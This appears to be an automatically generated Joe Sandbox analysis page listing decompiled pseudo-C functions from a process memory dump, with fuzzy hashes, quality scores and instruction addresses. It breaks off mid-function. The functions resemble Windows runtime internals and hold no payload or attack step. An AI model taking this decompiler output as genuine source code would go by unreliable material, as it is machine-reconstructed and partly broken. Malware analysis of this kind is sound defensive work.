Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
Instruction ID: f505f6daf56b0cce769f1cdccad0b9f83e621e06eebf9c75b9661e4d50672c3a
Opcode Fuzzy Hash: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
Instruction Fuzzy Hash: 60218071A01704EBCB15CFA9C984AAABBA6FF48314F108479FD059F241D770FE009B94

Uniqueness

Uniqueness Score: -1.00%

Function 04CE43D0 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E04CE43D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, signed int* _a32) {
				signed int _v8;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t30;
				signed int* _t41;
				void* _t42;
				intOrPtr _t43;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t57;
				signed int _t58;

				_t60 = (_t58 & 0xfffffff8) - 0x24;
				_v8 =  *0x4dab370 ^ (_t58 & 0xfffffff8) - 0x00000024;
				_t26 = _a4;
				_t49 = _a8;
				_t43 = _a16;
				_v28 = _t26;
				_v36 = _a20;
				_t41 = _a32;
				_t55 = _a12;
				if(_t26 == 0 || _t41 == 0 || _t55 == 0 || _t43 > 0x10000) {
					E04CDAB30(0x57);
					_t28 = 0x57;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *_t41 =  *_t41 & 0x00000000;
					_t41[1] = _t41[1] & 0x00000000;
					_t30 = E04CE44A8(_t26, _t49,  &_v24, _t43, _v36);
					_t53 = _t30;
					if(_t30 == 0) {
						_t57 =  *((intOrPtr*)( *[fs:0x18] + 0x34));
					} else {
						_t57 = E04CC19A0( &_v24, 2, _v28, _t53,  &_v36);
						if(_t57 != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
						} else {
							 *_t41 = _v36;
							_t41[1] = _v32;
						}
					}
					if(_t57 != 0) {
						E04CDAB30(_t57);
					}
					_t28 = _t57;
				}
				_pop(_t51);
				_pop(_t56);
				_pop(_t42);
				return E04CF4B50(_t28, _t42, _v8 ^ _t60, _t49, _t51, _t56);
			}

0x04ce43d8
0x04ce43e2
0x04ce43e6
0x04ce43e9
0x04ce43ec
0x04ce43ef
0x04ce43f7
0x04ce43fb
0x04ce43ff
0x04ce4405
0x04ce449e
0x04ce44a5
0x04ce4423
0x04ce442b
0x04ce4432
0x04ce4435
0x04ce4436
0x04ce4437
0x04ce443a
0x04ce443e
0x04ce4443
0x04ce4447
0x04d22eff
0x04ce444d
0x04ce4463
0x04ce4467
0x04d22f14
0x04ce446d
0x04ce4471
0x04ce4477
0x04ce4477
0x04ce4467
0x04ce447c
0x04ce4495
0x04ce4495
0x04ce447e
0x04ce447e
0x04ce4484
0x04ce4485
0x04ce4486
0x04ce4491

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f50f68b0be5ec0b4122a529b803557eb00506475bc9b5da3b5fca24b5c4488
Instruction ID: a4daabc60d4910b9fc1a7853654ac30a17b384301d6c428652229f527d550cf5
Opcode Fuzzy Hash: 35f50f68b0be5ec0b4122a529b803557eb00506475bc9b5da3b5fca24b5c4488
Instruction Fuzzy Hash: 5D21EE326047419BCB25CF16C880F6BB7E6FF88728F044519FD88AB240D730F901ABA6

Uniqueness

Uniqueness Score: -1.00%

Function 04D2E289 Relevance: .1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D2E289(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, void* _a8, intOrPtr _a12, signed int* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				short _t33;
				signed int _t34;
				intOrPtr _t35;
				signed int _t45;
				intOrPtr _t47;
				signed int _t48;
				signed int _t52;
				signed int _t54;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t62;
				signed int _t63;
				signed int _t64;

				_t62 = __ecx;
				_v8 = __edx;
				_t45 = _a4;
				_t3 = _t45 - 1; // 0x1
				if(_t3 > 0x13) {
					L16:
					_t33 = 0xc0000100;
					L17:
					return _t33;
				}
				_t34 = _t45 * 0x1c;
				_v16 = _t34;
				_t5 = _t34 + 0x4da6384; // 0x0
				_t54 =  *_t5;
				_t6 = _t34 + 0x4da6388; // 0x4da6389
				_t7 = _t34 + 0x4da6388; // 0x4da6389
				_t60 = _t7;
				_v20 = _t54;
				_t47 = _t6 + _t54 * 8;
				_v12 = _t47;
				_t48 = _a4;
				if(_t60 >= _t47) {
					L5:
					if(_t54 != 3) {
						_t35 =  *0x4da65d0; // 0x0
						if(_t35 == 0) {
							_t35 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t18 = _t34 + 0x4da639c; // 0x0
						_t35 =  *_t18;
					}
					 *_t62 = _t35;
					goto L16;
				}
				while(E04CD04F0( *_t60, _t48, _v8, _t48, 1) != 0) {
					_t48 = _a4;
					_t60 = _t60 + 8;
					if(_t60 < _v12) {
						continue;
					} else {
						_t34 = _v16;
						_t54 = _v20;
						goto L5;
					}
				}
				_t57 =  *_t60 + (_a4 + 1) * 2;
				_t22 = _t60 + 4; // 0x8000000
				_t61 = _a8;
				_t52 =  *_t22 -  *_t60 + (_a4 + 1) * 2 >> 1;
				_t24 = _t52 - 1; // 0x7ffffff
				_t63 = _t24;
				if(_t61 == 0) {
					L12:
					 *_a16 = _t52;
					_t33 = 0xc0000023;
					goto L17;
				}
				if(_t63 >= _a12) {
					if(_a12 >= 1) {
						 *_t61 = 0;
					}
					goto L12;
				}
				 *_a16 = _t63;
				_t64 = _t63 + _t63;
				E04CF88C0(_t61, _t57, _t64);
				_t33 = 0;
				 *((short*)(_t64 + _t61)) = 0;
				goto L17;
			}

0x04d2e292
0x04d2e294
0x04d2e297
0x04d2e29b
0x04d2e2a1
0x04d2e367
0x04d2e367
0x04d2e36c
0x04d2e36f
0x04d2e36f
0x04d2e2a7
0x04d2e2aa
0x04d2e2ad
0x04d2e2ad
0x04d2e2b3
0x04d2e2b9
0x04d2e2b9
0x04d2e2bf
0x04d2e2c2
0x04d2e2c5
0x04d2e2ca
0x04d2e2cd
0x04d2e2f3
0x04d2e2f6
0x04d2e350
0x04d2e357
0x04d2e362
0x04d2e362
0x04d2e2f8
0x04d2e2f8
0x04d2e2f8
0x04d2e2f8
0x04d2e365
0x00000000
0x04d2e365
0x04d2e2cf
0x04d2e2e2
0x04d2e2e5
0x04d2e2eb
0x00000000
0x04d2e2ed
0x04d2e2ed
0x04d2e2f0
0x00000000
0x04d2e2f0
0x04d2e2eb
0x04d2e306
0x04d2e309
0x04d2e30c
0x04d2e311
0x04d2e313
0x04d2e313
0x04d2e318
0x04d2e344
0x04d2e347
0x04d2e349
0x00000000
0x04d2e349
0x04d2e31d
0x04d2e33d
0x04d2e341
0x04d2e341
0x00000000
0x04d2e33d
0x04d2e322
0x04d2e324
0x04d2e329
0x04d2e331
0x04d2e333
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c448121899a280d9a2437929752c1eed85326d0e4c3af20e7aa368867e34414
Instruction ID: b4828f3989245bfc7526fbb45b7c5ad5350e406ae1508824c5c9d5aa0f2272bd
Opcode Fuzzy Hash: 8c448121899a280d9a2437929752c1eed85326d0e4c3af20e7aa368867e34414
Instruction Fuzzy Hash: C331BF35600225EFCF14CF18C9849AEB7F6FF98309B198859E84A9B350E730FA51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04CAE328 Relevance: .1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04CAE328(void* __ecx, void* __edx, signed int* _a4) {
				char _v8;
				signed int _v12;
				void* __ebx;
				signed int _t28;
				signed int _t32;
				signed int _t34;
				signed char* _t37;
				intOrPtr _t38;
				intOrPtr* _t50;
				signed int _t53;
				void* _t69;

				_push(__ecx);
				_push(__ecx);
				_t69 = __ecx;
				_t53 =  *(__ecx + 0x10);
				_t2 = _t69 + 0x14; // 0x14
				_t50 = _t2;
				_t28 = _t53 + __edx;
				_v12 = _t28;
				if(_t28 >  *_t50) {
					_v8 = _t28 -  *_t50;
					_push(E04CAF0E1( *((intOrPtr*)(__ecx + 0xc)), 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push(_t50);
					_push(0xffffffff);
					_t32 = E04CF2B10();
					__eflags = _t32;
					if(_t32 < 0) {
						 *_a4 =  *_a4 & 0x00000000;
						L2:
						return _t32;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t69 + 0xc)) + 0x1f8)) =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0xc)) + 0x1f8)) + _v8;
					_t34 = E04CC3C40();
					_t66 = 0x7ffe0380;
					__eflags = _t34;
					if(_t34 != 0) {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					} else {
						_t37 = 0x7ffe0380;
					}
					__eflags =  *_t37;
					if( *_t37 != 0) {
						_t38 =  *[fs:0x30];
						__eflags =  *(_t38 + 0x240) & 0x00000001;
						if(( *(_t38 + 0x240) & 0x00000001) == 0) {
							goto L7;
						}
						__eflags = E04CC3C40();
						if(__eflags != 0) {
							_t66 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E04D6F1C3(_t50,  *((intOrPtr*)(_t69 + 0xc)),  *_t50, __eflags, _v8,  *( *((intOrPtr*)(_t69 + 0xc)) + 0x74) << 3,  *_t66 & 0x000000ff);
						E04D6EFD3(_t50,  *((intOrPtr*)(_t69 + 0xc)),  *_t50, _v8, 9);
						goto L7;
					} else {
						L7:
						 *_t50 =  *_t50 + _v8;
						_t53 =  *(_t69 + 0x10);
						goto L1;
					}
				}
				L1:
				 *_a4 = _t53;
				 *(_t69 + 0x10) = _v12;
				_t32 = 0;
				goto L2;
			}

0x04cae32d
0x04cae32e
0x04cae331
0x04cae334
0x04cae337
0x04cae337
0x04cae33a
0x04cae33d
0x04cae342
0x04cae360
0x04cae368
0x04cae369
0x04cae371
0x04cae372
0x04cae374
0x04cae375
0x04cae377
0x04cae37c
0x04cae37e
0x04cae3b6
0x04cae351
0x04cae355
0x04cae355
0x04cae386
0x04cae38c
0x04cae391
0x04cae396
0x04cae398
0x04d0d753
0x04cae39e
0x04cae39e
0x04cae39e
0x04cae3a0
0x04cae3a3
0x04d0d75d
0x04d0d763
0x04d0d76a
0x00000000
0x00000000
0x04d0d775
0x04d0d777
0x04d0d782
0x04d0d782
0x04d0d782
0x04d0d79b
0x04d0d7aa
0x00000000
0x04cae3a9
0x04cae3a9
0x04cae3ac
0x04cae3ae
0x00000000
0x04cae3ae
0x04cae3a3
0x04cae344
0x04cae347
0x04cae34c
0x04cae34f
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1500e7d27353e492cd4aac5f88e20bbb0655133e18b835bb5c34c4425610e60d
Instruction ID: 017653b3405ac3a9e640b33c688f9a86414fc80607139adf55825169377d6125
Opcode Fuzzy Hash: 1500e7d27353e492cd4aac5f88e20bbb0655133e18b835bb5c34c4425610e60d
Instruction Fuzzy Hash: 3F318B31641645EFE721CF68C884F6AB7FAEF44358F1445A9E5169B280E770FE41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04CB8C79 Relevance: .1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04CB8C79(signed char __ecx, intOrPtr* __edx) {
				intOrPtr* _v8;
				void* _t18;
				char* _t21;
				signed char* _t23;
				signed int _t24;
				signed int _t25;
				intOrPtr _t26;
				signed char _t30;
				intOrPtr* _t33;
				void* _t36;
				void* _t39;
				char* _t42;
				signed char* _t46;

				_push(__ecx);
				_v8 = __edx;
				_t30 = __ecx;
				_t18 = E04CC3C40();
				_t42 = 0x7ffe0384;
				if(_t18 != 0) {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t21 = 0x7ffe0384;
				}
				_t46 = 0x7ffe0385;
				if( *_t21 != 0) {
					if(E04CC3C40() == 0) {
						_t23 = 0x7ffe0385;
					} else {
						_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t23 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t26 = E04CC3C40();
					if(_t26 != 0) {
						_t26 =  *[fs:0x30];
						_t42 =  *((intOrPtr*)(_t26 + 0x50)) + 0x22a;
					}
					if( *_t42 != 0) {
						_t26 =  *[fs:0x30];
						if(( *(_t26 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t26 = E04CC3C40();
						if(_t26 != 0) {
							_t26 =  *[fs:0x30];
							_t46 =  *((intOrPtr*)(_t26 + 0x50)) + 0x22b;
						}
						if(( *_t46 & 0x00000020) == 0) {
							goto L5;
						}
						L17:
						_t47 = _v8;
						_t33 = _v8;
						_t39 = _t33 + 2;
						do {
							_t24 =  *_t33;
							_t33 = _t33 + 2;
						} while (_t24 != 0);
						_t25 = _t24 | 0xffffffff;
						_t36 = (_t33 - _t39 >> 1) + (_t33 - _t39 >> 1);
						if((_t30 & 0x00000002) == 0) {
							if((_t30 & 0x00000001) == 0) {
								L24:
								_t26 = E04D30AFF(_t30, 0, _t25, _t36, _t47);
								goto L5;
							}
							_push(6);
							L23:
							_pop(_t25);
							goto L24;
						}
						_push(5);
						goto L23;
					} else {
						L5:
						return _t26;
					}
				}
			}

0x04cb8c7e
0x04cb8c82
0x04cb8c85
0x04cb8c87
0x04cb8c8c
0x04cb8c93
0x04d1222d
0x04cb8c99
0x04cb8c99
0x04cb8c99
0x04cb8c9e
0x04cb8ca3
0x04d1223e
0x04d12250
0x04d12240
0x04d12249
0x04d12249
0x04d12255
0x00000000
0x04d12257
0x00000000
0x04d12257
0x04cb8ca9
0x04cb8ca9
0x04cb8ca9
0x04cb8cb0
0x04d1225c
0x04d12265
0x04d12265
0x04cb8cb9
0x04d12270
0x04d1227d
0x00000000
0x00000000
0x04d12283
0x04d1228a
0x04d1228c
0x04d12295
0x04d12295
0x04d1229e
0x00000000
0x00000000
0x04d122a4
0x04d122a4
0x04d122a7
0x04d122a9
0x04d122ac
0x04d122ac
0x04d122af
0x04d122b2
0x04d122b9
0x04d122be
0x04d122c3
0x04d122cc
0x04d122d1
0x04d122d8
0x00000000
0x04d122d8
0x04d122ce
0x04d122d0
0x04d122d0
0x00000000
0x04d122d0
0x04d122c5
0x00000000
0x04cb8cbf
0x04cb8cbf
0x04cb8cc3
0x04cb8cc3
0x04cb8cb9

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6500f08a74af63fbfd20657ae4f9c8e6d1ec2716c2b9bdce45284f75af2ea64d
Instruction ID: c316c663ebc13a29bb7b2b9789e254389423405d4eab6408f840e4ca94346bfa
Opcode Fuzzy Hash: 6500f08a74af63fbfd20657ae4f9c8e6d1ec2716c2b9bdce45284f75af2ea64d
Instruction Fuzzy Hash: 56213871701680ABE72A9768E804B797399BF40754F0D08E4DC41A7BE1E26AFD40C260

Uniqueness

Uniqueness Score: -1.00%

Function 04D30371 Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04D30371(signed short* __ecx, intOrPtr __edx) {
				signed int _v8;
				signed short* _v16;
				intOrPtr _v20;
				signed short* _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t27;
				intOrPtr _t29;
				signed short _t37;
				signed short* _t43;
				signed int _t45;
				signed short _t51;
				signed short* _t52;
				intOrPtr _t53;
				signed short _t54;
				signed int _t55;

				_v8 =  *0x4dab370 ^ _t55;
				_v32 = _v32 & 0x00000000;
				_t43 = __ecx;
				_v40 = __edx;
				_t27 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t45 = _t27;
				_t51 = _t27;
				_t53 = _t45 + 2;
				_v36 = _t53;
				if(_t53 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t29 =  *0x4da5d78; // 0x0
					_t54 = E04CC5D90(_t45,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t29 + 0x180000, _t53);
					if(_t54 == 0) {
						L8:
						return E04CF4B50(_t32, _t43, _v8 ^ _t55, _t51, _t52, _t54);
					}
					E04CF88C0(_t54,  *_t52,  *_t43 & 0x0000ffff);
					 *((short*)(_t54 + (( *_t43 & 0x0000ffff) >> 1) * 2)) = 0;
					_t37 =  *_t43 & 0x0000ffff;
					L6:
					_t43 = _v32;
					_v28 = _t54;
					_v20 = (_t37 & 0x0000ffff) + 2;
					_v24 = _t43;
					_v16 = _t43;
					_t32 = E04CABD70(0x4c91298, _v40, 1,  &_v28);
					if(_t54 !=  *_t52) {
						_t32 = E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t54);
					}
					goto L8;
				}
				_t54 =  *_t52;
				if( *((intOrPtr*)(_t54 + _t45 * 2)) != _v32) {
					_t53 = _v36;
					goto L4;
				}
				_t37 = _t51;
				goto L6;
			}

0x04d30380
0x04d30383
0x04d30388
0x04d3038a
0x04d3038f
0x04d30392
0x04d30395
0x04d30397
0x04d3039d
0x04d303a0
0x04d303a5
0x04d303bb
0x04d303bb
0x04d303d5
0x04d303d9
0x04d30434
0x04d30442
0x04d30442
0x04d303e2
0x04d303f1
0x04d303f5
0x04d303f8
0x04d303f8
0x04d30401
0x04d30404
0x04d30410
0x04d30418
0x04d3041b
0x04d30422
0x04d3042f
0x04d3042f
0x00000000
0x04d30422
0x04d303a7
0x04d303b2
0x04d303b8
0x00000000
0x04d303b8
0x04d303b4
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8d753593d3bef2b4ea76c9e84df17b3776a260746bba6631e7a7f13de452ef3
Instruction ID: 72547167aa551297ef20370c704459ea1bafd8fa92989859d4a26463955b5114
Opcode Fuzzy Hash: b8d753593d3bef2b4ea76c9e84df17b3776a260746bba6631e7a7f13de452ef3
Instruction Fuzzy Hash: 9221AD71A00629ABCF15DF58C881ABEB7F5FF48704B440069E901AB244D778BD51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04D56D79 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E04D56D79(void* __eflags) {
				char _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v44;
				signed int _t31;
				signed int _t32;
				intOrPtr _t37;
				signed int _t41;
				signed int _t50;
				intOrPtr _t53;
				intOrPtr _t55;

				_t53 =  *[fs:0x30];
				_v32 = _t53;
				E04CBFED0(0x4da4800);
				E04D801EA(0x4da6dc8, 1,  &_v20);
				_t50 = 0;
				_t41 = 0;
				if( *((intOrPtr*)(_t53 + 0x88)) <= 0) {
					L9:
					return _t50;
				} else {
					goto L1;
				}
				do {
					L1:
					_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x90)) + _t41 * 4));
					if( *((intOrPtr*)(_t55 + 8)) != 0xddeeddee) {
						__eflags =  *(_t55 + 0x40) & 0x00000001;
						if(( *(_t55 + 0x40) & 0x00000001) != 0) {
							goto L15;
						}
						_t14 =  &_v24;
						 *_t14 = _v24 | 0xffffffff;
						__eflags =  *_t14;
						_v36 = _t50;
						_v28 = 0xfffc2f70;
						while(1) {
							_t31 = E04CE0990(__eflags,  *((intOrPtr*)(_t55 + 0xc8)));
							__eflags = _t31;
							if(_t31 != 0) {
								break;
							}
							_push( &_v28);
							_push(_t50);
							E04CF2CF0();
							_t37 = _v44 + 1;
							_v44 = _t37;
							__eflags = _t37 - 0x64;
							if(__eflags < 0) {
								continue;
							}
							__eflags = 0;
							_t50 = 0xc0000194;
							E04D599D6(0, _t41);
							goto L9;
						}
						__eflags =  *((char*)(_t55 + 0xea)) - 2;
						if( *((char*)(_t55 + 0xea)) != 2) {
							_t32 = _t50;
						} else {
							_t32 =  *(_t55 + 0xe4);
						}
						__eflags = _t32;
						if(_t32 != 0) {
							L04CC2330(_t32, _t32);
						}
					} else {
						if(( *(_t55 + 0xc) & 0x00000001) == 0) {
							E04D794B4(_t55);
						}
					}
					L15:
					_t53 = _v32;
					_t41 = _t41 + 1;
				} while (_t41 <  *((intOrPtr*)(_t53 + 0x88)));
				goto L9;
			}

0x04d56d86
0x04d56d93
0x04d56d97
0x04d56da9
0x04d56dae
0x04d56db0
0x04d56db8
0x04d56e28
0x04d56e30
0x00000000
0x00000000
0x00000000
0x04d56dba
0x04d56dba
0x04d56dc0
0x04d56dca
0x04d56ddb
0x04d56ddf
0x00000000
0x00000000
0x04d56de1
0x04d56de1
0x04d56de1
0x04d56de6
0x04d56dea
0x04d56df2
0x04d56df8
0x04d56dfd
0x04d56dff
0x00000000
0x00000000
0x04d56e05
0x04d56e06
0x04d56e07
0x04d56e10
0x04d56e11
0x04d56e15
0x04d56e18
0x00000000
0x00000000
0x04d56e1c
0x04d56e1e
0x04d56e23
0x00000000
0x04d56e23
0x04d56e31
0x04d56e38
0x04d56e42
0x04d56e3a
0x04d56e3a
0x04d56e3a
0x04d56e44
0x04d56e46
0x04d56e49
0x04d56e49
0x04d56dcc
0x04d56dd0
0x04d56dd4
0x04d56dd4
0x04d56dd0
0x04d56e4e
0x04d56e4e
0x04d56e52
0x04d56e53
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af0c14764c0f8a0e21a650efb817443228ef13b7c3849c2035f8d08a8154bf83
Instruction ID: 61f69dc32a56799925c4d7c1d6fdc2d5c9381827f150189a47ec9a0dd707777f
Opcode Fuzzy Hash: af0c14764c0f8a0e21a650efb817443228ef13b7c3849c2035f8d08a8154bf83
Instruction Fuzzy Hash: 9721A4316047508BEB20EE35C940A6FB6EAFFC5318F44892DE9EA93160DF70F9458791

Uniqueness

Uniqueness Score: -1.00%

Function 04CD2755 Relevance: .1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CD2755(signed int __edx) {
				void* _t14;
				char* _t17;
				signed char* _t27;
				void* _t31;
				signed int _t35;
				signed char* _t37;
				char* _t39;

				_t35 = __edx;
				_t14 = E04CC3C40();
				_t39 = 0x7ffe0384;
				if(_t14 != 0) {
					_t17 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t17 = 0x7ffe0384;
				}
				_t37 = 0x7ffe0385;
				if( *_t17 != 0) {
					if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
						if(E04CC3C40() == 0) {
							_t27 = 0x7ffe0385;
						} else {
							_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t27 & 0x00000020) != 0) {
							E04D30227(0x1480, _t35, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				_t31 = E04CBFED0(0x4da3390);
				if(E04CC3C40() != 0) {
					_t39 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t39 != 0) {
					if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
						if(E04CC3C40() != 0) {
							_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t37 & 0x00000020) != 0) {
							E04D30227(0x1481, _t35 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				return _t31;
			}

0x04cd2755
0x04cd275a
0x04cd275f
0x04cd2766
0x04d1ab65
0x04cd276c
0x04cd276c
0x04cd276c
0x04cd2771
0x04cd2776
0x04d1ab7c
0x04d1ab89
0x04d1ab9b
0x04d1ab8b
0x04d1ab94
0x04d1ab94
0x04d1aba0
0x04d1abb6
0x04d1abb6
0x04d1aba0
0x04d1ab7c
0x04cd2786
0x04cd278f
0x04d1abca
0x04d1abca
0x04cd2798
0x04d1abe2
0x04d1abef
0x04d1abfa
0x04d1abfa
0x04d1ac03
0x04d1ac19
0x04d1ac19
0x04d1ac03
0x04d1abe2
0x04cd27a3

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a57c6a91ea05c7502eb4e823f94d13fe856393adc7f8b5216251f6222a5daa83
Instruction ID: a63ed4c0813ac5fa06dd7cc787fbdfb5b8bfb71fdf491ff258dfa376a148754a
Opcode Fuzzy Hash: a57c6a91ea05c7502eb4e823f94d13fe856393adc7f8b5216251f6222a5daa83
Instruction Fuzzy Hash: 5721F9317456D0ABE3325768DD44F247797AB45B74F1903E4EE309B7E1D768B9009210

Uniqueness

Uniqueness Score: -1.00%

Function 04D2CD40 Relevance: .1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E04D2CD40(void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr* _a20) {
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t28;
				void* _t33;
				signed int _t35;
				signed int _t42;
				void* _t43;
				short* _t46;

				_t42 = _a8;
				if((_t42 & 0xfffffffe) == 0) {
					_t35 = _a12;
					if((_t35 & 0xffff0000 | _a16) == 0) {
						_t46 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x1c0);
						if(_t46 != 0) {
							E04CF8F40(_t46, 0, 0x1c0);
							 *(_t46 + 0x20) = _t35;
							 *_t46 = 0x1c0;
							_t28 = _a16;
							 *(_t46 + 0x24) = _t28;
							 *((short*)(_t46 + 2)) = 1;
							_push(0x18);
							_v24 = _t28;
							_push( &_v28);
							_push(0x20);
							_push(_a4);
							_v16 = 1;
							_v20 = _t42;
							_v28 = _t35;
							_v12 = _t46;
							_t43 = E04CF2A60();
							if(_t43 < 0) {
								E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t46);
							} else {
								 *_a20 = _t46;
							}
							_t33 = _t43;
						} else {
							_t33 = 0xc0000017;
						}
					} else {
